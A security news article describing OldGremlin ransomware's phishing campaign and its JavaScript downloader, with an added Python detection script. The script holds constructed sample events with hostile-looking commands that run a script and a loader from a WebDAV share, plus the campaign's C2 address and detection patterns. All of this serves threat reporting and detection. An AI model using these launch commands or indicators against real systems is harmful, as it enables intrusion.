OldGremlin Ransomware Group Launches Sophisticated Attack on Russian Companies

CyberSecureFox Editorial Team

The notorious ransomware group OldGremlin has resurfaced with a new sophisticated attack targeting Russian companies, particularly in the petrochemical sector. Cybersecurity experts at FACCT have uncovered a novel tool in the group’s arsenal: OldGremlin.JsDownloader, a JavaScript-based malware downloader that marks a significant evolution in their tactics.

Anatomy of the Attack: Impersonation and Deception

The attack vector involves a meticulously crafted phishing email, purportedly sent from a Diadoc employee named Olga Makarova. The email, targeting an unnamed Russian petrochemical company, cleverly mimics legitimate correspondence from Kontur.Diadoc, a well-known document management service. This impersonation tactic, previously observed in OldGremlin’s operations, demonstrates the group’s continued focus on social engineering.

The malicious email contains a link leading to a zip archive with an embedded LNK file. When executed, this file initiates a connection to a WebDAV server, a method consistent with OldGremlin’s past attacks. The payload then downloads and runs a Node.js interpreter, setting the stage for the deployment of the new OldGremlin.JsDownloader.

Technical Deep Dive: OldGremlin.JsDownloader

The heart of this attack lies in the OldGremlin.JsDownloader, a sophisticated JavaScript-based tool designed to fetch and execute arbitrary JavaScript code. This downloader employs several advanced techniques:

  • Connects to a command-and-control (C2) server at 157.230.18.205:80
  • Utilizes a challenge-response mechanism built on 32 bytes of random data
  • Implements public key cryptography for server authentication
  • Uses RC4 encryption with an MD5-hashed key for data obfuscation
  • Leverages the eval() function to execute downloaded JavaScript code

This multi-layered approach significantly enhances the malware’s ability to evade detection and complicates analysis efforts by cybersecurity researchers.
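As an added illustration of how the delivery chain described above (a WebDAV UNC path in a command line, a Node.js interpreter launched from a user-writable location, and a connection to the published C2 address) could be surfaced in endpoint telemetry, the following Python is not FACCT's or the article's code. The event records are constructed samples in a Sysmon-like shape, and the 203.0.113.10 WebDAV host is a documentation address, not an indicator from the campaign.

```python
import re

# Network indicator reported for this campaign (from the article): C2 at 157.230.18.205:80.
OLDGREMLIN_C2 = ("157.230.18.205", 80)

# WebDAV redirector paths look like \\host@80\DavWWWRoot\... or \\host@SSL@443\...
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:SSL@)?\d+\\", re.IGNORECASE)
# node.exe running from a user-writable directory rather than a normal install location.
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Downloads|Public)\\.*node\.exe$", re.IGNORECASE)

# Constructed sample records (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "\\203.0.113.10@80\DavWWWRoot\share\run.cmd"'},
    {"type": "process", "image": r"C:\Users\ivan\AppData\Local\Temp\node.exe",
     "cmdline": r"node.exe \\203.0.113.10@80\DavWWWRoot\share\loader.js"},
    {"type": "process", "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" server.js'},
    {"type": "network", "image": r"C:\Users\ivan\AppData\Local\Temp\node.exe",
     "dst_ip": "157.230.18.205", "dst_port": 80},
    {"type": "network", "image": r"C:\Program Files\nodejs\node.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443},
]

def classify_process(event):
    """Return the names of the detections that fire for one process-creation record."""
    hits = []
    cmd = event.get("cmdline", "")
    image = event.get("image", "")
    if WEBDAV_UNC.search(cmd):
        hits.append("webdav_unc_in_cmdline")
    if image.lower().endswith("node.exe"):
        if USER_WRITABLE.search(image):
            hits.append("node_from_user_writable_path")
        if re.search(r"\s\\\\", cmd):  # script argument is a UNC path
            hits.append("node_script_from_unc")
    return hits

def classify_network(event):
    """Flag outbound connections to the C2 endpoint named in the report."""
    if (event.get("dst_ip"), event.get("dst_port")) == OLDGREMLIN_C2:
        return ["oldgremlin_c2_contact"]
    return []

def scan(events):
    """Run each record through the matching classifier; return (index, hits) for those that fire."""
    findings = []
    for i, ev in enumerate(events):
        hits = classify_network(ev) if ev.get("type") == "network" else classify_process(ev)
        if hits:
            findings.append((i, hits))
    return findings
```

The legitimate developer launch of node.exe from Program Files produces no finding, which is the false-positive case such rules need to tolerate.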

Implications and Defensive Measures

The reemergence of OldGremlin with enhanced capabilities poses a serious threat to Russian businesses, especially those in critical sectors like petrochemicals. The group’s history of demanding substantial ransoms, reaching up to 1 billion rubles in 2022, underscores the potential financial impact of these attacks.

Organizations must prioritize cybersecurity measures to defend against such sophisticated threats. Key recommendations include:

  • Implementing robust email filtering and security awareness training to combat phishing attempts
  • Regularly updating and patching systems to address known vulnerabilities
  • Employing advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating JavaScript-based threats
  • Conducting regular security audits and penetration testing to identify potential weaknesses in organizational defenses

As cyber threats continue to evolve, staying informed about the latest attack vectors and maintaining a proactive security posture is crucial for organizations across all sectors. The OldGremlin case serves as a stark reminder of the persistent and adaptive nature of modern cybercriminal groups, emphasizing the need for continuous vigilance and security innovation in the face of ever-changing threats.
